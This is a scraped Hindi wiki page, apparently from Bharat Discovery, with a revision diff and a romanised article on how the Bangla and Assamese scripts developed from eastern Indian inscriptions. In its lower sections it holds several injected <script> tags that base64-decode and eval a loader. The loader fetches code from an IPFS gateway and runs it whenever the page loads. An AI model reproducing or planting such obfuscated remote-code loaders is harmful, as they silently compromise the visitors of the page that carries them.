Difference between revisions of "बांग्ला लिपि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:हिन्दी भाषा (को हटा दिया गया हैं।))
 
(5 intermediate revisions by 2 users not shown)
Line 1: Line 1:
बांग्ला और असमिया लिपियों में बहुत समानता है और इन दोनों का विकास एकसाथ ही हुआ है। पं. गौरीशंकर हीराचंद ओझा (ओझाजी) का मत था कि,<blockquote>"बांग्ला लिपि भारतवर्ष के पूर्वी विभाग अर्थात् [[मगध]] की तरफ की लिपि से निकली है और [[बिहार]], [[बंगाल]], [[मिथिला]], [[नेपाल]], [[आसाम]] तथा [[उड़ीसा]] से मिलने वाले कितने एक शिलालेख, दानपत्र, सिक्कों या हस्तलिखित पुस्तकों में पाई जाती है।"</blockquote> किन्तु लगता है कि कुछ पुरालिपिविद [[नागरी लिपि]] के साथ बांग्ला लिपि का यह रिश्ता पसन्द नहीं करते हैं। इसलिए पूर्वी [[भारत]] में 8वीं शताब्दी तक कुटिल लिपि का जो रूप यत्र-तत्र दिखाई देता है, उसी में बांग्ला के आद्य रूप वाले कुछ अक्षर खोजने का प्रयत्न आजकल कुछ पुरालिपिविद कर रहे हैं। सच्चाई तो यह है कि भारत की लिपियों पर प्रान्तीय का वेश हम बहुत दावे के साथ नहीं चढ़ा सकते। लिपियों के अध्ययन की सुविधा के लिए ही अब तक हम इनका वर्गीकरण करते चले आए हैं; वरना भारत की सभी लिपियाँ [[ब्राह्मी लिपि]] से निकली हैं। दसवीं शताब्दी के आसपास से ही भारत की वर्तमान लिपियाँ एक-दूसरे से थोड़ी-थोड़ी दूर हटती दिखाई देती हैं। अब यदि पूर्वी भारत के 8वीं शताब्दी के किसी अभिलेख को उठाकर कोई पुराविद कहे कि इसके बहुत से अक्षर [[नागरी लिपि]] से मिलते हैं, तो यह बात भी हमें मान लेनी पड़ती है। वस्तुतः सभी संधिकालीन परिस्थितियों में भी इसी प्रकार की खींचतान होती है। इसीलिए हम इस प्रश्न की गहराई में न जाकर केवल उन्हीं लेखों में से कुछ का उल्लेख करेंगे, जिनमें बांग्ला-असमिया लिपियों का विकास देखने को मिलता है।  
+
बांग्ला और असमिया लिपियों में बहुत समानता है और इन दोनों का विकास एकसाथ ही हुआ है। [[गौरीशंकर हीराचंद ओझा|पं. गौरीशंकर हीराचंद ओझा]] (ओझाजी) का मत था कि,<blockquote>"बांग्ला लिपि भारतवर्ष के पूर्वी विभाग अर्थात् [[मगध]] की तरफ की लिपि से निकली है और [[बिहार]], [[बंगाल]], [[मिथिला]], [[नेपाल]], [[आसाम]] तथा [[उड़ीसा]] से मिलने वाले कितने एक शिलालेख, दानपत्र, सिक्कों या हस्तलिखित पुस्तकों में पाई जाती है।"</blockquote> किन्तु लगता है कि कुछ पुरालिपिविद [[नागरी लिपि]] के साथ बांग्ला लिपि का यह रिश्ता पसन्द नहीं करते हैं। इसलिए पूर्वी [[भारत]] में 8वीं शताब्दी तक कुटिल लिपि का जो रूप यत्र-तत्र दिखाई देता है, उसी में बांग्ला के आद्य रूप वाले कुछ अक्षर खोजने का प्रयत्न आजकल कुछ पुरालिपिविद कर रहे हैं। सच्चाई तो यह है कि भारत की लिपियों पर प्रान्तीय का वेश हम बहुत दावे के साथ नहीं चढ़ा सकते। लिपियों के अध्ययन की सुविधा के लिए ही अब तक हम इनका वर्गीकरण करते चले आए हैं; वरना भारत की सभी लिपियाँ [[ब्राह्मी लिपि]] से निकली हैं। दसवीं शताब्दी के आसपास से ही भारत की वर्तमान लिपियाँ एक-दूसरे से थोड़ी-थोड़ी दूर हटती दिखाई देती हैं। अब यदि पूर्वी भारत के 8वीं शताब्दी के किसी अभिलेख को उठाकर कोई पुराविद कहे कि इसके बहुत से अक्षर [[नागरी लिपि]] से मिलते हैं, तो यह बात भी हमें मान लेनी पड़ती है। वस्तुतः सभी संधिकालीन परिस्थितियों में भी इसी प्रकार की खींचतान होती है। इसीलिए हम इस प्रश्न की गहराई में न जाकर केवल उन्हीं लेखों में से कुछ का उल्लेख करेंगे, जिनमें बांग्ला-असमिया लिपियों का विकास देखने को मिलता है।  
  
पूर्वी भारत के ग्यारहवीं शताब्दी के लेखों में हमें पहली बार बांग्ला लिपि की झलक देखने को मिलती है। 8वीं शताब्दी में गौडदेश ([[अखण्डित बंगाल|बंगाल]]) में पाल राजाओं का शासन आरम्भ हुआ। सभी [[पाल वंश|पालवंशी]] राजा [[बौद्ध]] थे। नारायणपाल के समय (लगभग 854-908 ई.) के बाद स्तम्भलेख के केवल कुछ अक्षर ही बांग्ला जैसे दिखाई देते हैं। परन्तु विजयसेन के देवपाड़ा-लेख के अक्षरों का झुकाव स्पष्ट रूप से बांग्ला की ओर दिखाई देता है। यह लेख 11वीं शताब्दी के उत्तरार्ध का है। इस लेख में ‘प’ तथा ‘य’ और ‘व’ तथा ‘ब’ में विशेष अन्तर नहीं है। इसमें अवग्रह (ऽ) का भी प्रयोग देखने को मिलता है, जो वहाँ नागरी के ‘इ’ अक्षर-सा है। 12वीं शताब्दी के लेखों में तो बांग्ला लिपि अपनी स्वतंत्र विशेषताओं को ग्रहण करने लगती है। इस शताब्दी के कुछ प्रसिद्ध अभिलेख हैं- गोपाल तृतीय के समय का मंदा-लेख, बंगाल के राजा लक्ष्मणसेन का तर्पणदिघी-दानपत्र, मधईनगर-शिलालेख और ढाका-मूर्तिलेख, अशोकचल्ल का 1170 ई. का [[बुद्धगया]]-लेख, 1175 ई. का गदाधर मन्दिर लेख और कैम्ब्रिज संग्रहालय की ‘पंचरक्षा’ ‘योगरत्नमाला’ तथा ‘गुह्यावलि-विवृत्ति’ हस्तलिपियाँ।  
+
पूर्वी भारत के ग्यारहवीं शताब्दी के लेखों में हमें पहली बार बांग्ला लिपि की झलक देखने को मिलती है। 8वीं शताब्दी में गौडदेश ([[अखण्डित बंगाल|बंगाल]]) में पाल राजाओं का शासन आरम्भ हुआ। सभी [[पाल वंश|पालवंशी]] राजा [[बौद्ध]] थे। [[नारायणपाल]] के समय (लगभग 860-915 ई.) के बाद स्तम्भलेख के केवल कुछ अक्षर ही बांग्ला जैसे दिखाई देते हैं। परन्तु विजयसेन के देवपाड़ा-लेख के अक्षरों का झुकाव स्पष्ट रूप से बांग्ला की ओर दिखाई देता है। यह लेख 11वीं शताब्दी के उत्तरार्ध का है। इस लेख में ‘प’ तथा ‘य’ और ‘व’ तथा ‘ब’ में विशेष अन्तर नहीं है। इसमें अवग्रह (ऽ) का भी प्रयोग देखने को मिलता है, जो वहाँ नागरी के ‘इ’ अक्षर-सा है। 12वीं शताब्दी के लेखों में तो बांग्ला लिपि अपनी स्वतंत्र विशेषताओं को ग्रहण करने लगती है। इस शताब्दी के कुछ प्रसिद्ध अभिलेख हैं- गोपाल तृतीय के समय का मंदा-लेख, बंगाल के राजा लक्ष्मणसेन का तर्पणदिघी-दानपत्र, मधईनगर-शिलालेख और ढाका-मूर्तिलेख, अशोकचल्ल का 1170 ई. का [[बुद्धगया]]-लेख, 1175 ई. का गदाधर मन्दिर लेख और कैम्ब्रिज संग्रहालय की ‘पंचरक्षा’ ‘योगरत्नमाला’ तथा ‘गुह्यावलि-विवृत्ति’ हस्तलिपियाँ।  
  
कामरूप के राजाओं के भी बहुत-से दानपत्र, शिलालेख तथा अंकित मुद्राएँ मिली हैं। इनमें राजा वैद्यदेव का दानपत्र साहित्यिक दृष्टि से विशेष महत्व का है, क्योंकि इसके रचयिता प्रसिद्ध कवि उमापतिधर हैं। समकालीन कवि जयदेव ने ‘गीतगोविन्द’ काव्य में उमापतिधर के बारे में कहा था- वाचः पल्लवयत्युमापतिधरः (उमापतिधर अपने शब्दों को पल्लव की तरह प्रस्फुटित करते हैं)। उमापतिधर द्वारा रचित इस दानपत्र में भी ‘अवग्रह’ का प्रयोग देखने को मिलता है। यहाँ हम इस दानपत्र का नमूना दे रहे हैं।
+
कामरूप के राजाओं के भी बहुत-से दानपत्र, शिलालेख तथा अंकित मुद्राएँ मिली हैं। इनमें राजा वैद्यदेव का दानपत्र साहित्यिक दृष्टि से विशेष महत्त्व का है, क्योंकि इसके रचयिता प्रसिद्ध कवि उमापतिधर हैं। समकालीन कवि जयदेव ने ‘[[गीत गोविन्द]]’ काव्य में उमापतिधर के बारे में कहा था- वाचः पल्लवयत्युमापतिधरः (उमापतिधर अपने शब्दों को पल्लव की तरह प्रस्फुटित करते हैं)। उमापतिधर द्वारा रचित इस दानपत्र में भी ‘अवग्रह’ का प्रयोग देखने को मिलता है। यहाँ हम इस दानपत्र का नमूना दे रहे हैं।
  
 
[[असम]] में वल्लभदेव या वल्लभेन्द्र का 1185 ई. का एक दानपत्र मिला है। इस दानपत्र के लेख में कहीं-कहीं ‘न’ और ‘ल’ में तथा ‘प’ और ‘य’ में स्पष्ट अन्तर नहीं है। ‘व’ और ‘ब’ में तो बिल्कुल भेद नहीं है। बाद में अन्य लिपियों से भेद स्पष्ट करने के लिए असम की लिपि को ‘असमाक्षर’ का नाम दिया गया।  
 
[[असम]] में वल्लभदेव या वल्लभेन्द्र का 1185 ई. का एक दानपत्र मिला है। इस दानपत्र के लेख में कहीं-कहीं ‘न’ और ‘ल’ में तथा ‘प’ और ‘य’ में स्पष्ट अन्तर नहीं है। ‘व’ और ‘ब’ में तो बिल्कुल भेद नहीं है। बाद में अन्य लिपियों से भेद स्पष्ट करने के लिए असम की लिपि को ‘असमाक्षर’ का नाम दिया गया।  
Line 15: Line 15:
 
12वीं शताब्दी के बाद बांग्ला लिपि के ताम्रपत्रों, प्रस्तरों, [[भूर्जपत्र (लेखन सामग्री)|भूर्जपत्रों]] और विविध प्रकार के [[काग़ज़|काग़ज़ों]] पर बहुत-से अभिलेख मिलते हैं। उड़िया लिपि 14वीं शताब्दी तक तो बांग्ला के साथ चलती है, परन्तु उसके बाद इसका विकास स्वतंत्र रूप से होता है। उसके अक्षर अधिकाधिक गोलाकार होते जाते हैं और उनमें गुंडियाँ बनती जाती हैं। इसका कारण यह है कि उड़ीसा के लिपिकर [[ताड़पत्र (लेखन सामग्री)|ताडपत्रों]] पर लिखते थे और लोहे की शलाका का प्रयोग करते थे।  
 
12वीं शताब्दी के बाद बांग्ला लिपि के ताम्रपत्रों, प्रस्तरों, [[भूर्जपत्र (लेखन सामग्री)|भूर्जपत्रों]] और विविध प्रकार के [[काग़ज़|काग़ज़ों]] पर बहुत-से अभिलेख मिलते हैं। उड़िया लिपि 14वीं शताब्दी तक तो बांग्ला के साथ चलती है, परन्तु उसके बाद इसका विकास स्वतंत्र रूप से होता है। उसके अक्षर अधिकाधिक गोलाकार होते जाते हैं और उनमें गुंडियाँ बनती जाती हैं। इसका कारण यह है कि उड़ीसा के लिपिकर [[ताड़पत्र (लेखन सामग्री)|ताडपत्रों]] पर लिखते थे और लोहे की शलाका का प्रयोग करते थे।  
  
{{प्रचार}}
+
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 29: Line 29:
 
{{हिन्दी भाषा}}
 
{{हिन्दी भाषा}}
 
{{भाषा और लिपि}}
 
{{भाषा और लिपि}}
[[Category:भाषा_और_लिपि]]
+
[[Category:भाषा और लिपि]][[Category:भाषा कोश]][[Category:साहित्य_कोश]]
[[Category:साहित्य_कोश]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 11:46, 19 May 2015

baangla aur asamiya lipiyoan mean bahut samanata hai aur in donoan ka vikas ekasath hi hua hai. pan. gaurishankar hirachand ojha (ojhaji) ka mat tha ki,

"baangla lipi bharatavarsh ke poorvi vibhag arthath magadh ki taraph ki lipi se nikali hai aur bihar, bangal, mithila, nepal, asam tatha u disa se milane vale kitane ek shilalekh, danapatr, sikkoan ya hastalikhit pustakoan mean paee jati hai."

kintu lagata hai ki kuchh puralipivid nagari lipi ke sath baangla lipi ka yah rishta pasand nahian karate haian. isalie poorvi bharat mean 8vian shatabdi tak kutil lipi ka jo roop yatr-tatr dikhaee deta hai, usi mean baangla ke ady roop vale kuchh akshar khojane ka prayatn ajakal kuchh puralipivid kar rahe haian. sachchaee to yah hai ki bharat ki lipiyoan par prantiy ka vesh ham bahut dave ke sath nahian chadha sakate. lipiyoan ke adhyayan ki suvidha ke lie hi ab tak ham inaka vargikaran karate chale ae haian; varana bharat ki sabhi lipiyaan brahmi lipi se nikali haian. dasavian shatabdi ke asapas se hi bharat ki vartaman lipiyaan ek-doosare se tho di-tho di door hatati dikhaee deti haian. ab yadi poorvi bharat ke 8vian shatabdi ke kisi abhilekh ko uthakar koee puravid kahe ki isake bahut se akshar nagari lipi se milate haian, to yah bat bhi hamean man leni p dati hai. vastutah sabhi sandhikalin paristhitiyoan mean bhi isi prakar ki khianchatan hoti hai. isilie ham is prashn ki gaharaee mean n jakar keval unhian lekhoan mean se kuchh ka ullekh kareange, jinamean baangla-asamiya lipiyoan ka vikas dekhane ko milata hai.

poorvi bharat ke gyarahavian shatabdi ke lekhoan mean hamean pahali bar baangla lipi ki jhalak dekhane ko milati hai. 8vian shatabdi mean gaudadesh (bangal) mean pal rajaoan ka shasan arambh hua. sabhi palavanshi raja bauddh the. narayanapal ke samay (lagabhag 860-915 ee.) ke bad stambhalekh ke keval kuchh akshar hi baangla jaise dikhaee dete haian. parantu vijayasen ke devapa da-lekh ke aksharoan ka jhukav spasht roop se baangla ki or dikhaee deta hai. yah lekh 11vian shatabdi ke uttarardh ka hai. is lekh mean ‘p’ tatha ‘y’ aur ‘v’ tatha ‘b’ mean vishesh antar nahian hai. isamean avagrah (a) ka bhi prayog dekhane ko milata hai, jo vahaan nagari ke ‘i’ akshar-sa hai. 12vian shatabdi ke lekhoan mean to baangla lipi apani svatantr visheshataoan ko grahan karane lagati hai. is shatabdi ke kuchh prasiddh abhilekh haian- gopal tritiy ke samay ka manda-lekh, bangal ke raja lakshmanasen ka tarpanadighi-danapatr, madheenagar-shilalekh aur dhaka-moortilekh, ashokachall ka 1170 ee. ka buddhagaya-lekh, 1175 ee. ka gadadhar mandir lekh aur kaimbrij sangrahalay ki ‘pancharaksha’ ‘yogaratnamala’ tatha ‘guhyavali-vivritti’ hastalipiyaan.

kamaroop ke rajaoan ke bhi bahut-se danapatr, shilalekh tatha aankit mudraean mili haian. inamean raja vaidyadev ka danapatr sahityik drishti se vishesh mahattv ka hai, kyoanki isake rachayita prasiddh kavi umapatidhar haian. samakalin kavi jayadev ne ‘git govind’ kavy mean umapatidhar ke bare mean kaha tha- vachah pallavayatyumapatidharah (umapatidhar apane shabdoan ko pallav ki tarah prasphutit karate haian). umapatidhar dvara rachit is danapatr mean bhi ‘avagrah’ ka prayog dekhane ko milata hai. yahaan ham is danapatr ka namoona de rahe haian.

asam mean vallabhadev ya vallabhendr ka 1185 ee. ka ek danapatr mila hai. is danapatr ke lekh mean kahian-kahian ‘n’ aur ‘l’ mean tatha ‘p’ aur ‘y’ mean spasht antar nahian hai. ‘v’ aur ‘b’ mean to bilkul bhed nahian hai. bad mean any lipiyoan se bhed spasht karane ke lie asam ki lipi ko ‘asamakshar’ ka nam diya gaya.

lipyantar

uchchitrani digambarasy vasananyardhaanganasvamino
ratnalankritibhirvvishoshitavapuah shobhaah shatansubhruvah
pauradyashch puriah shmashanavasaterbhikshabhujosyakshayaan
lakshmian s vyatanoddaridrabharane sujno hi senanvayah..

12vian shatabdi ke bad baangla lipi ke tamrapatroan, prastaroan, bhoorjapatroan aur vividh prakar ke kagazoan par bahut-se abhilekh milate haian. u diya lipi 14vian shatabdi tak to baangla ke sath chalati hai, parantu usake bad isaka vikas svatantr roop se hota hai. usake akshar adhikadhik golakar hote jate haian aur unamean guandiyaan banati jati haian. isaka karan yah hai ki u disa ke lipikar tadapatroan par likhate the aur lohe ki shalaka ka prayog karate the.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>